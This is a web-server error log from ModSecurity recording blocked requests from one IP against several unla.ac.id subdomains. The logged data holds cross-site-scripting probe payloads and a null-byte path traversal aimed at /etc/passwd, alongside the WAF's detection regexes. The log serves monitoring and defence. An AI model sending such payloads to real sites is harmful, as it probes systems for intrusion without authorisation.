[Tue Aug 29 11:56:31.853381 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16f8Co-f0AAAq5@SIAAAAK"]
[Tue Aug 29 11:56:32.967837 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_4c417fa93f05a6c1142d086a2b81f21f44682fb3"): Internal error [hostname "informatika.unla.ac.id"] [uri "/embed.js"] [unique_id "ZO16gMCo-f0AAArHa3gAAAAJ"]
[Tue Aug 29 11:56:32.969858 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_abfa90f666903dc891da995b2ce41b245c240c54"): Internal error [hostname "www.unla.ac.id"] [uri "/onlinePreview"] [unique_id "ZO16gMCo-f0AAAoAlCgAAAAC"]
[Tue Aug 29 11:56:33.600141 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAAolK3AAAAAe"]
[Tue Aug 29 11:56:33.600756 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAAqsV@YAAAAB"]
[Tue Aug 29 11:56:33.760209 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAAqSw88AAAAN"]
[Tue Aug 29 11:56:33.761034 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAArB12UAAAAV"]
[Tue Aug 29 11:56:33.777109 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAAqsV@oAAAAB"]
[Tue Aug 29 11:56:34.554359 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gsCo-f0AAAqsV@sAAAAB"]
[Tue Aug 29 11:56:34.576213 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAAqsV@wAAAAB"]
[Tue Aug 29 11:56:34.591205 2023] [:error] [pid 2764] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAArMmroAAAAf"]
[Tue Aug 29 11:56:34.591799 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAAq3a-wAAAAI"]
[Tue Aug 29 11:56:34.591811 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAAq@smYAAAAM"]
[Tue Aug 29 11:56:34.610359 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAAoz8LEAAAAS"]
[Tue Aug 29 11:56:35.627374 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16g8Co-f0AAAq@smkAAAAM"]
[Tue Aug 29 11:56:36.527893 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAArB12wAAAAV"]
[Tue Aug 29 11:56:36.559067 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAArB120AAAAV"]
[Tue Aug 29 11:56:36.568982 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAArHa4cAAAAJ"]
[Tue Aug 29 11:56:36.572510 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAq@smsAAAAM"]
[Tue Aug 29 11:56:36.642691 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAAqeFqkAAAAx"]
[Tue Aug 29 11:56:36.647179 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAAqsV-EAAAAB"]
[Tue Aug 29 11:56:36.672412 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAqsV-IAAAAB"]
[Tue Aug 29 11:56:36.679923 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAq@sm4AAAAM"]
[Tue Aug 29 11:56:36.680233 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAAocyk8AAAAR"]
[Tue Aug 29 11:56:36.694390 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAqsV-MAAAAB"]
[Tue Aug 29 11:56:37.537854 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hcCo-f0AAAq@snAAAAAM"]
[Tue Aug 29 11:56:37.602650 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hcCo-f0AAAqeFrAAAAAx"]
